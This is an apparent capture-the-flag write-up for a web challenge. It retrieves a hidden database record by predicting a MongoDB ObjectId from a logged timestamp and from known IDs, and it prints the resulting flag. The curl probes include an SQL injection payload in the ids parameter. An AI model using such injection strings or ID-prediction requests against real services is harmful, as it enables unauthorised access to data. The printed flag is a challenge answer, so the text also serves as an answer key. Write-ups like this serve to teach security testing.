I have created what I believe to be the best website ever. Or maybe it’s just really boring. I don’t know.
After checking the source code of the page, I noticed the following comment:
1 |
<!--developers: make sure to record your actions in log.txt--> |
Then, I decided to check log.txt file.
1 2 3 4 5 |
$ curl 'http://web.angstromctf.com:7667/log.txt' Sat Aug 10 2017 10:23:17 GMT-0400 (EDT) - Initial website Sat Aug 10 2017 14:54:07 GMT-0400 (EDT) - Database integration Sat Aug 11 2017 14:08:54 GMT-0400 (EDT) - Make some changes to the text Sat Mar 17 2018 16:24:17 GMT+0000 (UTC) - Add super secret flag to database |
Now, we know the flag is in the database. After watching the web browser’s network traffic during the load of the index page, I found the following request:
1 2 3 4 5 6 7 8 9 10 11 |
GET /boxes?ids=5aad412be07e1e001cfce6d2,5aad412be07e1e001cfce6d3,5aad412be07e1e001cfce6d4 HTTP/1.1 Host: web.angstromctf.com:7667 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://web.angstromctf.com:7667/ X-Requested-With: XMLHttpRequest Connection: keep-alive If-None-Match: W/"183-Tv299FSONRL0nObibB59WErSwqE" Cache-Control: max-age=0 |
Here is the response of the request.
1 |
{"boxes":[{"_id":"5aad412be07e1e001cfce6d2","data":"Go away.^This website has literally nothing of interest. You might as well leave.","__v":0},{"_id":"5aad412be07e1e001cfce6d3","data":"You will be very bored.^Seriously, there's nothing interesting.","__v":0},{"_id":"5aad412be07e1e001cfce6d4","data":"Please just leave.^Scrolling more will only give you more boring content.","__v":0}]} |
This request makes an SQL query to retrieve the information. Let’s play with it a little bit.
1 2 3 4 5 6 |
$ curl 'http://web.angstromctf.com:7667/boxes?ids=1,2,3' {"boxes":[null,null,null]} $ curl 'http://web.angstromctf.com:7667/boxes?ids=1,2,3,4' number of ids does not equal 3 $ curl "http://web.angstromctf.com:7667/boxes?ids=1,2,3)'+or+1=1%23" {"boxes":[null,null,null]} |
It simply returns exactly 3 objects from the database using their ids. I tried to find some SQL Injection, but failed. Then, I started to analyze the working 3 object ids. They are 96-bits and log.txt only provided us the timestamp of the flag’s addition. The only thing that came in my mind was the ObjectIds.
An ObjectId is a 12 byte BSON type and it is in the following structure:
- The first 4 bytes are the seconds since the unix epoch
- The next 3 bytes are the machine identifier.
- The next 2 bytes are the process id.
- The last 3 bytes are the counter value.
Let’s calculate the first 4 bytes using the flag’s addition time Sat Mar 17 2018 16:24:17 GMT+0000 (UTC).
We can use this website to convert the timestamp to the hexadecimal. Our result is 5aad4131.
We will retrieve the machine id and process id from the known ObjectIds.
MachineID is e07e1e.
ProcessID is 001c.
Our counter value should be the last counter value + 1 which is fce6d5.
If we merge them all, our flag’s ObjectId is 5aad4131e07e1e001cfce6d5.
Let’s try to retrieve the flag using the ObjectId we found.
1 2 |
$ curl 'http://web.angstromctf.com:7667/boxes?ids=5aad4131e07e1e001cfce6d5,2,3' {"boxes":[{"_id":"5aad4131e07e1e001cfce6d5","data":"actf{0bj3ct_ids_ar3nt_s3cr3ts}","__v":0},null,null]} |
Here is the flag actf{0bj3ct_ids_ar3nt_s3cr3ts}.